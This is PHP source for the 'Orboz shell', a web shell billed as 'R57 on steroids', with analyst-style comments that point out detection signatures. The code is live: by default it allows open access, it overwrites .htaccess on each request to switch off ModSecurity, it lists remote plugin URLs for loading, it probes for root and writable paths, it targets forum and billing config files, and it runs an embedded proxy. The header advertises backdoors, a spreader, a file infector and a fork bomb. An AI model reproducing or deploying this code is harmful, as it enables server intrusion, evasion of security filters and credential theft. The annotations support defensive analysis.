Gonzalez

orboz shell


   <?php
/*
* Orboz shell .. R57 On steroids
* Build: 4
* List of must-makes:
* - TODO: More database support; -999%
* - TODO: Spoofer Shit; not started
* - TODO: Proxy POST Shit
* - TODO: Rootkit shit
* - TODO: New spread method
* - TODO: Import WHMCS Tools; 10%
* - TODO: Import vBulluten Tools
* - TODO: Import phpBB Tools
* - TODO: Search Tool
* - TODO: locator
* - TODO: Plugins
*
* Features:
* - Shell Killer
* - Server quick-info bar:
* > Server IP
* > Your IP
* > Disk space
* > Safe_mode Status
* > Open_BaseDir Status
* > Magic_Quotes Status
* > Register globals Status
* > System Type
* > Server software
* > Disabled functions
* > ID
* > Shell location
* > PHP Version
* > Check Remote includes
* > Read /etc/passwd?
* > MySQL Status
* > cURL Status
* > Check for Root
* > /tmp writable?
* > getcwd() writable?
* - File listing with CHMOD, Rename, Move, Delete functions
* - File Infector (Mini-Shell in PHP file)
* - Bypassers: cURL, copy(), Perl, ioncube
* - Bypassers for Windows: Com wscript.shell, Ffi WinExec
* - Locator
* - Port Scanner
* - Search Files
* - Rootkit Tools
* - Spreader
* - Fork Bomb that launches several methods
* - PHP Eval
* - Run Shell Script
* - Crypt data with: MD5, SHA1, Crypt, CRC32, CRC16, Base64 Encode, Base64 decode, URL encode, URL decode, Bin2Hex, Hex2Bin, Dec2Hex, Hex2Dec, Blowfish, Standard DES, Extended DES, Apr1 md5, Shadow MD5
* - Database Functions:
* > MySQL:
* * Connect to server
* * Manage a database
* * Run Queries
* * View important information; Table Count, etc
* * Dump/Export Table and Database
* * Create Tables
* * List Proccess
* - Backdoor functions: Perl Backdoor, Connect to, Rev3rse Krew BC; with automatic perl location setting
* - Server Info; Processor Information, CPU Info, Memory Information
* - PhpInfo; With in-the-making bypasser (for blocked phpinfo)
* - Built-In Proxy
* - Plugins that will allow to add other functions [incom]
*
*
*/

/* Defaults.. */
// Analyst note: these two calls run on every request, before any access check.
// The error-suppressed set_magic_quotes_runtime() call is a legacy PHP API, which
// suggests the file was written for old PHP releases.
session_start();
@set_magic_quotes_runtime(false);

/***********************************\
* Settings *
\***********************************/

/*
* ENABLE_PLUGINS
* Change to true if you want to enabled plugins
*
* Analyst note: shipped as true. How the flag is consumed is not visible in
* this part of the file.
*/
define("ENABLE_PLUGINS", true);

/*
* DEBUG_MODE
* Change to true if you want to show errors
*/
define("DEBUG_MODE", false);

/*
* ignor0rzz
* Ignore all false statments in checkups.. enabled normaly
*
* Analyst note: an unusual constant name; together with the other defines in
* this block it is a stable string to match when scanning web roots.
*/
define("ignor0rzz", true);
/*
* ACCESS_TYPE
* 0 = Regular Access
* 1 = I.P. restricted (md5 format)
* 2 = Hostname format (md5 format)
* 3 = Username/Password Required (md5 format)
*
* Analyst note: the shipped value is 0. The access switch that reads this
* constant performs no check for 0, so a copy left at the default answers
* any client that requests it.
*/
define("ACCESS_TYPE", 0);

/*
* ACCESS_STRING -> THESE ARE ALWAYS MD5'D
* If..
* 0 = Regular Access :: Dosen't matter what it is
* 1 = I.P. restricted (md5 format) :: md5 your I.P (use ?md5=_YOUR_IP_)
* 2 = Hostname format (md5 format) :: md5 your hostname (use ?md5=_hostname)
* 3 = Username/Password Required (md5 format) :: md5 both username and password, put in format username:password (use ?md5a=_USERNAME_&md5b=_PASSWORD_)
*
* Analyst note: the value is one or two unsalted MD5 hex digests (two joined
* by ":" for ACCESS_TYPE 3). The literal below is the shipped default and can
* be used as a file-content match; an operator who enabled access control
* will have replaced it, so do not rely on it alone.
*/
define("ACCESS_STRING", "14c4b06b824ec593239362517f538b29:5f4dcc3b5aa765d61d8327deb882cf99");
/*
* END settings DO NOT edit anything else!
*/

// Build number; matches "Build: 4" in the file header.
define("V", 4);

// Compatibility shim: on PHP older than 4.1.0 the superglobals are aliased to
// the pre-4.1 $HTTP_*_VARS arrays so the rest of the script can use $_GET etc.
if(version_compare(phpversion(), "4.1.0") == -1) {
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}

/*
* Access gate, selected by ACCESS_TYPE. Every mode compares an MD5 hex digest
* of a request attribute against ACCESS_STRING; mode 0 performs no check.
*
* Analyst notes for log review:
* - Mode 3 answers unauthenticated clients with a 401 and the Basic-auth realm
*   "Passworded Area".
* - Modes 1 and 2 answer non-matching clients with a Location header whose
*   value is "../../../../../../../"; that response value is distinctive.
*/
switch(ACCESS_TYPE) {
case 3:
// HTTP Basic credentials: md5(user) . ":" . md5(password) must equal ACCESS_STRING.
if (!isset($_SERVER['PHP_AUTH_USER']) || (md5($_SERVER['PHP_AUTH_USER']) . ":" . md5($_SERVER['PHP_AUTH_PW']))!= ACCESS_STRING) {
header('WWW-Authenticate: Basic realm="Passworded Area"');
header('HTTP/1.0 401 Unauthorized');
exit("<h1>401 Unauthorized</h1><p>Your login details are incorrect!</p>");
}
break;

case 2:
/* Send them back a few dirs if there data is wrong.. this can confuse the user and make them lose where the shell is */
// Reverse-DNS name of the client address is hashed and compared.
// NOTE(review): PHP normally switches the status to a redirect once a Location
// header is set, so the 404 line may not reach the client - confirm on the host.
if(md5(gethostbyaddr($_SERVER['REMOTE_ADDR'])) != ACCESS_STRING) {
header("HTTP/1.0 404 Not Found");
header("Location: ../../../../../../../");
exit();
}
break;

case 1:
// Client IP address is hashed and compared.
if(md5($_SERVER['REMOTE_ADDR']) != ACCESS_STRING) {
header("HTTP/1.0 404 Not Found");
header("Location: ../../../../../../../");
exit();
}
// No break here: control falls through to case 0/default, which only breaks.

case 0:
default:
// Open access: nothing is checked.
break;
}

/*
* Plugin System
* To use the plugin system, simply link it to the r00t plugin
* spot.
*
* E.G
* $plugin[1] = "http://www.example.com/plugin.name";
*
* DO NOT EDIT THE FIRST ONE! ($plugin[0] = 0;) SIMPLY ADD
* THEM UNDER!
*
* Analyst note: plugin entries are remote URLs. The loader is not visible in
* this part of the file; presumably it fetches and runs what the URLs return,
* so outbound HTTP requests from the web server process to unfamiliar hosts
* are worth correlating with requests to this script - confirm against the
* loader. The example above writes $plugin while the code below uses $plugins.
*/

/* DEFAULT DO NOT CHANGE THIS */
$plugins[0] = 0;

/*
* Name: Shell Updater
* Desc: This will check for updates on the shell, it will
* add a box to the top of the page if needed.
*
* TODO: Get an update server
*/
// Disabled in this build: the only plugin URL is commented out.
//$plugins[1] = "http://www.todo.com/updater.txt";

/* Few bypassers */
// Analyst note: attempts to switch off safe_mode and open_basedir at runtime.
// NOTE(review): on common PHP builds these directives cannot be relaxed from a
// script, so this is likely a no-op on a correctly configured host - confirm.
if(function_exists("ini_alter")) {
ini_alter("safe_mode", "off");
ini_alter("open_basedir", "off");
}

// Analyst note: host-side tampering that happens on every request to this file.
// 1. The .htaccess in the script's working directory is made world-writable
//    (mode 0777), with errors suppressed.
// 2. If the file exists OR is writable, its content is read into
//    $current_htaccess (not referenced again in the visible part of the file)
//    and the file is then reopened in "w" mode, which truncates it.
// 3. The only content written back is an <IfModule mod_security.c> stanza with
//    SecFilterEngine Off / SecFilterScanPOST Off (these look like ModSecurity
//    1.x directives).
// Indicators: a .htaccess that holds nothing but that stanza, a .htaccess with
// mode 0777, or rewrite/auth rules that vanished from a directory. File
// integrity monitoring on .htaccess and a vhost that does not honour
// per-directory overrides both blunt this step.
@chmod("./.htaccess", 0777);
if(file_exists("./.htaccess") || is_writable("./.htaccess")) {
$current_htaccess = file_get_contents("./.htaccess");
$fh = fopen("./.htaccess", "w");
fwrite($fh, "
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>");
fclose($fh);
}

// Analyst note: environment fingerprinting. Nothing in this block changes the
// host; it records which PHP extensions are present and which sensitive
// directories the web server account can write to.
$pagestart = microtime();
// Feature probes: cURL, MSSQL, PostgreSQL and Oracle client functions.
$curl_on = function_exists('curl_version');
$mssql_on = function_exists('mssql_connect');
$pg_on = function_exists('pg_connect');
$ora_on = function_exists('ocilogon');
$disable_functions = ini_get("disable_functions");

// Client address as seen by the script. The first two sources are request
// headers supplied by the client, so the value is not trustworthy.
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}

// Directory and file names associated with forum and billing software.
// NOTE(review): their use is not visible here; presumably they drive a search
// for application config files - confirm against the code that reads them.
$int_paths = array("mybb", "phpbb", "phpbb2", "bb", "vb", "vboard", "phpbb3", "forum", "forums", "board", "boards", "bb", "discuss");
$config_files = array("config.php", "configuration.php", "settings", "mysql", "vb", "vboard", "phpbb3", "forum", "forums", "board", "boards", "bb", "discuss");
$billing_paths = array("whmcs", "cart", "shop", "billing", "", "payments", "bpay", "payway");

// Display value when no functions are disabled in php.ini.
if($disable_functions == "") {
$disable_functions = "None";
}

// Despite the variable name, this tests whether /home/ is writable.
if(is_dir("/home/") && is_writable("/home/")) {
$home_readable = true;
} else {
$home_readable = false;
}

// Privilege heuristic: a writable /root/ (or C:/Windows/) is treated as
// running with administrative rights.
if(is_dir("/root/") && is_writable("/root/")) {
$your_root = true;
} else {
/*
* check windows
*/
if(is_dir("C:/Windows/") && is_writable("C:/Windows/")) {
$your_root = true;
} else {
$your_root = false;
}
}


// Despite the variable name, this tests whether /tmp/ is writable.
if(is_dir("/tmp/") && is_writable("/tmp/")) {
$tmp_readable = true;
} else {
$tmp_readable = false;
}

// Analyst note: helper endpoints used to produce the digests for ACCESS_STRING.
// They emit a page headed "Quick MD5 Results" and stop. In access logs they
// appear as requests to this script with an md5=, md5a= or md5b= query
// parameter; the response heading is a usable body signature.
if(isset($_GET['md5'])) {
echo("<h1>Quick MD5 Results</h1>");
// The literal value "_hostname" selects the reverse-DNS name of the caller
// instead of hashing the parameter itself.
if($_GET['md5'] == "_hostname") {
echo("Hostname md5'd<br />" . md5(gethostbyaddr($_SERVER['REMOTE_ADDR'])));
} else {
echo(md5($_GET['md5']));
}
exit();
}

// Username/password variant: prints md5(md5a) . ":" . md5(md5b).
if(isset($_GET['md5a']) || isset($_GET['md5b'])) {
echo("<h1>Quick MD5 Results</h1>");
echo(md5($_GET['md5a']) . ":" . md5($_GET['md5b']));
exit();
}

// _loadplugins() is defined outside the visible part of the file.
// NOTE(review): presumably it processes the $plugins URL list - confirm.
_loadplugins();

if(isset($_GET['go']) && $_GET['go'] == "proxyx") {
$_config = array
(
'url_var_name' => 'q',
'flags_var_name' => 'hl',
'get_form_name' => '____pgfa',
'basic_auth_var_name' => '____pbavn',
'max_file_size' => -1,
'allow_hotlinking' => 0,
'upon_hotlink' => 1,
'compress_output' => 0
);
$_flags = array
(
'include_form' => 1,
'remove_scripts' => 0,
'accept_cookies' => 1,
'show_images' => 1,
'show_referer' => 0,
'rotate13' => 1,
'base64_encode' => 1,
'strip_meta' => 1,
'strip_title' => 0,
'session_cookies' => 1
);
$_frozen_flags = array
(
'include_form' => 0,
'remove_scripts' => 0,
'accept_cookies' => 0,
'show_images' => 0,
'show_referer' => 0,
'rotate13' => 0,
'base64_encode' => 0,
'strip_meta' => 0,
'strip_title' => 0,
'session_cookies' => 0
);
$_labels = array
(
'include_form' => array('Include Form', 'Include mini URL-form on every page'),
'remove_scripts' => array('Remove Scripts', 'Remove client-side scripting (i.e JavaScript)'),
'accept_cookies' => array('Accept Cookies', 'Allow cookies to be stored'),
'show_images' => array('Show Images', 'Show images on browsed pages'),
'show_referer' => array('Show Referer', 'Show actual referring Website'),
'rotate13' => array('Rotate13', 'Use ROT13 encoding on the address'),
'base64_encode' => array('Base64', 'Use base64 encodng on the address'),
'strip_meta' => array('Strip Meta', 'Strip meta information tags from pages'),
'strip_title' => array('Strip Title', 'Strip page title'),
'session_cookies' => array('Session Cookies', 'Store cookies for this session only')
);

$_hosts = array
(
'#^127\.|192\.168\.|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|67.43.227.231|rev3rse.org|www.rev3rse.org#i'
);
$_hotlink_domains = array();
$_insert = array();

$_iflags = '';
$_system = array
(
'ssl' => extension_loaded('openssl') && version_compare(PHP_VERSION, '4.3.0', '>='),
'uploads' => ini_get('file_uploads'),
'gzip' => extension_loaded('zlib') && !ini_get('zlib.output_compression'),
'stripslashes' => get_magic_quotes_gpc()
);
$_proxify = array('text/html' => 1, 'application/xml+xhtml' => 1, 'application/xhtml+xml' => 1, 'text/css' => 1);
$_version = '0.5b2';
$_http_host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost');
$_script_url = 'http' . ((isset($_ENV['HTTPS']) && $_ENV['HTTPS'] == 'on') || $_SERVER['SERVER_PORT'] == 443 ? 's' : '') . '://' . $_http_host . ($_SERVER['SERVER_PORT'] != 80 && $_SERVER['SERVER_PORT'] != 443 ? ':' . $_SERVER['SERVER_PORT'] : '') . $_SERVER['PHP_SELF'];
$_script_base = substr($_script_url, 0, strrpos($_script_url, '/')+1);
$_url = '';
$_url_parts = array();
$_base = array();
$_socket = null;
$_request_method = $_SERVER['REQUEST_METHOD'];
$_request_headers = '';
$_cookie = '';
$_post_body = '';
$_response_headers = array();
$_response_keys = array();
$_http_version = '';
$_response_code = 0;
$_content_type = 'text/html';
$_content_length = false;
$_content_disp = '';
$_set_cookie = array();
$_retry = false;
$_quit = false;
$_basic_auth_header = '';
$_basic_auth_realm = '';
$_auth_creds = array();
$_response_body = '';

/*
* Renders the proxy's HTML page (style sheet, optional auth or error banner,
* then the address form with one checkbox per non-frozen flag) and terminates
* the request with exit(0). It never returns to the caller.
*
* $data is an array; the keys read here are 'category' ('auth' or 'error'),
* and depending on it 'realm', 'group', 'type' and 'error'. Any other category
* produces only the form.
*
* Analyst note: the page heading "r00t-access Shell Proxy" and the form action
* "?go=proxyx" are fixed strings in every response from this function and can
* serve as response-body signatures.
*/
function show_report($data)
{

echo '<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<style type="text/css">
body, input
{
font-family: "Bitstream Vera Sans", Arial, Helvetica, sans-serif;
color: #234;
}

a
{
color: #9B9C83;
text-decoration:none;
border-bottom: 0px;
}

a:hover
{
color: #0080FF;
}

#container
{
border: 0px;
-moz-border-radius: 0px;
margin: auto;
padding: 0px;
width: 700px;
}

#title
{
color: #CC6633;
margin: 0;
}

ul#navigation, ul#form
{
list-style-type: none;
padding: 0;
margin: 0;
}

ul#navigation
{
float: right;
}

ul#form
{
clear: both;
}

ul#navigation li
{
float: left;
margin: 0;
padding: 5px 0;
border-top: 2px #BFAA9B solid;
}

ul#navigation li a
{
font-weight: bold;
color: #ffffff;
background-color: #AA8E79;
padding: 5px 15px;
margin-left: 1px;
text-decoration: none;
border-bottom: 0 #ffffff solid;
}

ul#navigation li a:hover
{
color: #44352C;
}

ul#form li
{
width: 700px;
}

#footer
{
color: #9B9C83;
font-size: small;
text-align: right;
}

#address_bar
{
border-top: 2px #BFAA9B solid;
border-bottom: 3px #44352C solid;
background-color: #AA8E79;
text-align: center;
padding: 5px 0;
color: #ffffff;
}

#go
{
background-color: #ffffff;
font-weight: bold;
color: #AA8E79;
border: 0 #ffffff solid;
padding: 2px 5px;
}

#address_box
{
width: 500px;
}

.option
{
padding: 2px 0;
background-color: #EEEBEA;
}

.option label
{
border-bottom: 2px #ffffff solid;
}

form
{
margin: 0;
}

#error, #auth
{
background-color: #BF6464;
border-top: 1px solid #44352C;
border-bottom: 1px solid #44352C;
width: 700px;
clear: both;
}

#auth
{
background-color: #94C261;
}

#error p, #auth p, #auth form
{
margin: 5px;
}
</style>
</head>
<body onload="document.getElementById(\'address_box\').focus()">
<div id="container">
<h1><font color="white">r00t-access Shell Proxy</font></h1>';

// Banner selection. Only 'auth' and 'error' are handled.
switch ($data['category'])
{
case 'auth':

// Credential prompt for a remote site that answered with Basic auth. The realm
// is HTML-escaped for display and carried in a hidden field as base64; the
// remote host name is written into the page without escaping.
echo '<div id="auth"><p>
<b>Enter your username and password for "' . htmlspecialchars($data['realm']) . '" on ' . $GLOBALS['_url_parts']['host'] . '</b>
<form method="post" action="?go=proxyx">
<input type="hidden" name="' . $GLOBALS['_config']['basic_auth_var_name'] . ' " value="' . base64_encode($data['realm']) . '" />
<label>Username <input type="text" name="username" value="" /></label> <label>Password <input type="password" name="password" value="" /></label> <input type="submit" value="Login" />
</form></p></div>';

break;
case 'error':
echo '<div id="error"><p>';

// $message is assigned only in the inner cases that match; for any other
// group/type/error combination it is still unset when it is echoed below.
switch ($data['group'])
{
case 'url':
echo '<b>URL Error (' . $data['error'] . ')</b>: ';
switch ($data['type'])
{
case 'internal':
$message = 'Failed to connect to the specified host. '
. 'Possible problems are that the server was not found, the connection timed out, or the connection refused by the host. '
. 'Try connecting again and check if the address is correct.';
break;
case 'external':
switch ($data['error'])
{
case 1:
$message = 'The URL you\'re attempting to access is blacklisted by this server. Please select another URL.';
break;
case 2:
$message = 'The URL you entered is malformed. Please check whether you entered the correct URL or not.';
break;
}
break;
}
break;
case 'resource':
echo '<b>Resource Error:</b> ';
switch ($data['type'])
{
case 'file_size':
$message = 'The file your are attempting to download is too large.<br />'
. 'Maxiumum permissible file size is <b>' . number_format($GLOBALS['_config']['max_file_size']/1048576, 2) . ' MB</b><br />'
. 'Requested file size is <b>' . number_format($GLOBALS['_content_length']/1048576, 2) . ' MB</b>';
break;
case 'hotlinking':
$message = 'It appears that you are trying to access a resource through this proxy from a remote Website.<br />'
. 'For security reasons, please use the form below to do so.';
break;
}
break;
}

echo 'An error has occured while trying to browse through the proxy. <br />' . $message . '</p></div>';
break;
}
?>
<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>?go=proxyx">
<ul id="form">
<li id="address_bar"><label>Web Address <input id="address_box" type="text" name="<?php echo $GLOBALS['_config']['url_var_name'] ?>" value="<?php echo isset($GLOBALS['_url']) ? htmlspecialchars($GLOBALS['_url']) : '' ?>" onfocus="this.select()" /></label> <input id="go" type="submit" value="Go" /></li>
<?php

// One checkbox per flag that is not frozen; the label text is the second
// element of the flag's entry in $_labels.
foreach ($GLOBALS['_flags'] as $flag_name => $flag_value)
{
if (!$GLOBALS['_frozen_flags'][$flag_name])
{
echo '<li class="option"><label><input type="checkbox" name="' . $GLOBALS['_config']['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' />' . $GLOBALS['_labels'][$flag_name][1] . '</label></li>' . "\n";
}
}
?>
</ul>
</form>
</div>
</body>
</html>
<?php
// The request always ends here.
exit(0);
}

/*
* Builds the value of one Set-Cookie header.
*
* $name and $value are each passed through rawurlencode() twice. When
* $expires is non-empty it is formatted as a GMT date; the cookie is always
* scoped to path "/" and to "." followed by $GLOBALS['_http_host'].
*
* Returns the header value as a string; it does not send the header itself.
*/
function add_cookie($name, $value, $expires = 0)
{
return rawurlencode(rawurlencode($name)) . '=' . rawurlencode(rawurlencode($value)) . (empty($expires) ? '' : '; expires=' . gmdate('D, d-M-Y H:i:s \G\M\T', $expires)) . '; path=/; domain=.' . $GLOBALS['_http_host'];
}

/*
* Flattens a (possibly nested) array of form fields into a one-level map.
*
* Keys become bracketed paths such as parent[child], with every segment
* url-encoded; scalar values are url-encoded. Nested arrays are handled by
* recursion, passing the path built so far as $parent_key.
*
* Returns the flattened array.
*/
function set_post_vars($array, $parent_key = null)
{
$temp = array();

foreach ($array as $key => $value)
{
// Extend the bracketed path, or start it at the top level.
$key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key);
if (is_array($value))
{
$temp = array_merge($temp, set_post_vars($value, $key));
}
else
{
$temp[$key] = urlencode($value);
}
}

return $temp;
}

/*
* Flattens an upload description array (it is called with $_FILES elsewhere in
* the file) into one entry per uploaded file.
*
* The array is walked with the same bracketed, url-encoded key paths that
* set_post_vars() builds. Only leaves whose path starts with
* field[name], field[type] or field[tmp_name] are kept; that segment is removed
* from the path and used as the inner key, so the result maps each field
* path to an array holding its 'name', 'type' and 'tmp_name'.
*/
function set_post_files($array, $parent_key = null)
{
$temp = array();

foreach ($array as $key => $value)
{
$key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key);
if (is_array($value))
{
$temp = array_merge_recursive($temp, set_post_files($value, $key));
}
// $m[1] is the field name, $m[2] is which of name/type/tmp_name this leaf is.
else if (preg_match('#^([^\[\]]+)\[(name|type|tmp_name)\]#', $key, $m))
{
$temp[str_replace($m[0], $m[1], $key)][$m[2]] = $value;
}
}

return $temp;
}

/*
* Parses $url and writes a normalised description of it into $container
* (passed by reference).
*
* On success $container receives the parse_url() fields plus: 'port_ext'
* (":port" when a port was given, otherwise ''), 'port' (defaulted to 443 for
* https and 80 otherwise), 'path' (with "." and ".." segments resolved and
* characters outside the allowed set percent-encoded), 'file', 'dir', 'base'
* (scheme://host[:port] plus the directory) and 'prev_dir'.
*
* Returns true on success and false when parse_url() yields an empty result;
* $container is left untouched in that case.
*
* NOTE(review): 'scheme' and 'host' are read without an isset() check, so an
* input lacking them relies on PHP's notice-and-null behaviour.
*/
function url_parse($url, & $container)
{
// Parse errors are suppressed; an empty result is handled below.
$temp = @parse_url($url);

if (!empty($temp))
{
$temp['port_ext'] = '';
$temp['base'] = $temp['scheme'] . '://' . $temp['host'];

if (isset($temp['port']))
{
$temp['base'] .= $temp['port_ext'] = ':' . $temp['port'];
}
else
{
$temp['port'] = $temp['scheme'] === 'https' ? 443 : 80;
}

$temp['path'] = isset($temp['path']) ? $temp['path'] : '/';
$path = array();
$temp['path'] = explode('/', $temp['path']);

foreach ($temp['path'] as $dir)
{
if ($dir === '..')
{
// Parent reference: drop the previous segment.
array_pop($path);
}
else if ($dir !== '.')
{
// Decode the segment, then rebuild it byte by byte: characters in the
// allowed set are kept, everything else is percent-encoded again.
for ($dir = rawurldecode($dir), $new_dir = '', $i = 0, $count_i = strlen($dir); $i < $count_i; $new_dir .= strspn($dir{$i}, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$-_.+!*\'(),?:@&;=') ? $dir{$i} : rawurlencode($dir{$i}), ++$i);
$path[] = $new_dir;
}
}

// Rejoin with a single leading slash and restore "~" after a slash.
$temp['path'] = str_replace('/%7E', '/~', '/' . ltrim(implode('/', $path), '/'));
$temp['file'] = substr($temp['path'], strrpos($temp['path'], '/')+1);
$temp['dir'] = substr($temp['path'], 0, strrpos($temp['path'], '/'));
$temp['base'] .= $temp['dir'];
$temp['prev_dir'] = substr_count($temp['path'], '/') > 1 ? substr($temp['base'], 0, strrpos($temp['base'], '/')+1) : $temp['base'] . '/';
$container = $temp;

return true;
}

return false;
}

/*
* Turns a URL found in a fetched page into an absolute URL and, when $proxify
* is true, into a link that points back at this script.
*
* Relative forms are resolved against $GLOBALS['_base'] (the page being
* proxied). "#..." and "mailto:" links are left unproxied. The proxied form is
* <script url>?<url_var_name>=<encoded url><fragment>&go=proxyx; the
* unproxied form is the URL with "&go=proxyx" appended.
*
* Returns '' for an empty input, otherwise the rewritten URL.
*
* Analyst note: every link rewritten here carries "go=proxyx", so browsing
* through the proxy appears in access logs as repeated requests to one script
* with that parameter and an encoded address parameter.
*/
function complete_url($url, $proxify = true)
{
$url = trim($url);

if ($url === '')
{
return '';
}

// Fragment: "#" followed by the substring that starts at the last "#".
$hash_pos = strrpos($url, '#');
$fragment = $hash_pos !== false ? '#' . substr($url, $hash_pos) : '';
$sep_pos = strpos($url, '://');

// No scheme separator within the first few characters: treat as relative.
if ($sep_pos === false || $sep_pos > 5)
{
switch ($url{0})
{
case '/':
// "//host/..." inherits the scheme; "/path" inherits scheme, host and port.
$url = substr($url, 0, 2) === '//' ? $GLOBALS['_base']['scheme'] . ':' . $url : $GLOBALS['_base']['scheme'] . '://' . $GLOBALS['_base']['host'] . $GLOBALS['_base']['port_ext'] . $url;
break;
case '?':
$url = $GLOBALS['_base']['base'] . '/' . $GLOBALS['_base']['file'] . $url;
break;
case '#':
$proxify = false;
break;
case 'm':
if (substr($url, 0, 7) == 'mailto:')
{
$proxify = false;
break;
}
// Any other "m..." value falls through to the default case.
default:
$url = $GLOBALS['_base']['base'] . '/' . $url;
}
}

return $proxify ? "{$GLOBALS['_script_url']}?{$GLOBALS['_config']['url_var_name']}=" . encode_url($url) . $fragment . "&go=proxyx" : $url . "&go=proxyx";
}

/*
* Rewrites every url(...) reference in a CSS string so that it points back at
* this script.
*
* Each match is replaced by url(<proxify_css_url() result>&go=proxyx).
* Returns the rewritten CSS.
*/
function proxify_inline_css($css)
{
// Capture group 1 is the raw content between "url(" and the closing ")".
preg_match_all('#url\s*\(\s*(([^)]*(\\\))*[^)]*)(\)|$)?#i', $css, $matches, PREG_SET_ORDER);

for ($i = 0, $count = count($matches); $i < $count; ++$i)
{
$css = str_replace($matches[$i][0], 'url(' . proxify_css_url($matches[$i][1]) . "&go=proxyx" . ')', $css);
}

return $css;
}

/*
* Rewrites a whole style sheet: first every url(...) reference through
* proxify_inline_css(), then every quoted @import target.
*
* Returns the rewritten CSS.
*/
function proxify_css($css)
{
$css = proxify_inline_css($css);

// Groups: 1 = double-quoted target, 2 = single-quoted target,
// 3 = text up to the terminator, 4 = ";" or end of input.
preg_match_all("#@import\s*(?:\"([^\">]*)\"?|'([^'>]*)'?)([^;]*)(;|$)#i", $css, $matches, PREG_SET_ORDER);

for ($i = 0, $count = count($matches); $i < $count; ++$i)
{
$delim = '"';
$url = $matches[$i][2];

if (isset($matches[$i][3]))
{
$delim = "'";
$url = $matches[$i][3];
}

// $url is assigned above but the replacement is built from capture group 1.
$css = str_replace($matches[$i][0], '@import ' . $delim . proxify_css_url($matches[$i][1]) . $delim . (isset($matches[$i][4]) ? $matches[$i][4] : ''), $css);
}

return $css;
}

/*
* Rewrites a single CSS URL token.
*
* A leading single or double quote is remembered as the delimiter. The token
* is stripped of that delimiter, backslash escapes are removed, the result is
* passed through complete_url(), and parentheses, commas, whitespace, quotes
* and backslashes in the rewritten URL are backslash-escaped again before the
* delimiter is put back.
*
* Returns the rewritten token, including its original quoting.
*/
function proxify_css_url($url)
{
$url = trim($url);
$delim = strpos($url, '"') === 0 ? '"' : (strpos($url, "'") === 0 ? "'" : '');

return $delim . preg_replace('#([\(\),\s\'"\\\])#', '\\$1', complete_url(trim(preg_replace('#\\\(.)#', '$1', trim($url, $delim))))) . $delim;
}

if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']]) && isset($_POST[$_config['flags_var_name']]))
{
foreach ($_flags as $flag_name => $flag_value)
{
$_iflags .= isset($_POST[$_config['flags_var_name']][$flag_name]) ? (string)(int)(bool)$_POST[$_config['flags_var_name']][$flag_name] : ($_frozen_flags[$flag_name] ? $flag_value : '0');
}

$_iflags = base_convert(($_iflags != '' ? $_iflags : '0'), 2, 16);
}
else if (isset($_GET[$_config['flags_var_name']]) && !isset($_GET[$_config['get_form_name']]) && ctype_alnum($_GET[$_config['flags_var_name']]))
{
$_iflags = $_GET[$_config['flags_var_name']];
}
else if (isset($_COOKIE['flags']) && ctype_alnum($_COOKIE['flags']))
{
$_iflags = $_COOKIE['flags'];
}

if ($_iflags !== '')
{
$_set_cookie[] = add_cookie('flags', $_iflags, time()+2419200);
$_iflags = str_pad(base_convert($_iflags, 16, 2), count($_flags), '0', STR_PAD_LEFT);
$i = 0;

foreach ($_flags as $flag_name => $flag_value)
{
$_flags[$flag_name] = $_frozen_flags[$flag_name] ? $flag_value : (int)(bool)$_iflags{$i};
$i++;
}
}

if ($_flags['rotate13'])
{
function encode_url($url)
{
return rawurlencode(str_rot13($url));
}
function decode_url($url)
{
return str_replace(array('&', '&'), '&', str_rot13(rawurldecode($url)));
}
} else if ($_flags['base64_encode']) {
/*
*Stop annoying errors in zend
*/
eval("
function encode_url(\$url)
{
return rawurlencode(base64_encode(\$url));
}
function decode_url(\$url)
{
return str_replace(array('&', '&'), '&', base64_decode(rawurldecode(\$url)));
}");
}
else
{
eval("
function encode_url(\$url)
{
return rawurlencode(\$url);
}
function decode_url(\$url)
{
return str_replace(array('&', '&'), '&', rawurldecode(\$url));
}");
}


if ($_config['compress_output'] && $_system['gzip'])
{
ob_start('ob_gzhandler');
}


if ($_system['stripslashes'])
{
function _stripslashes($value)
{
return is_array($value) ? array_map('_stripslashes', $value) : (is_string($value) ? stripslashes($value) : $value);
}

$_GET = _stripslashes($_GET);
$_POST = _stripslashes($_POST);
$_COOKIE = _stripslashes($_COOKIE);
}


if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']])) {
header('Location: ' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_POST[$_config['url_var_name']]) . '&' . $_config['flags_var_name'] . '=' . base_convert($_iflags, 2, 16) . "&go=proxyx");
exit(0);
}

if (isset($_GET[$_config['get_form_name']])) {
$_url = decode_url($_GET[$_config['get_form_name']]);
$qstr = strpos($_url, '?') !== false ? (strpos($_url, '?') === strlen($_url)-1 ? '' : '&') : '?';
$arr = explode('&', $_SERVER['QUERY_STRING']);

if (preg_match('#^\Q' . $_config['get_form_name'] . '\E#', $arr[0]))
{
array_shift($arr);
}

$_url .= $qstr . implode('&', $arr);
}
else if (isset($_GET[$_config['url_var_name']]))
{
$_url = decode_url($_GET[$_config['url_var_name']]);
}
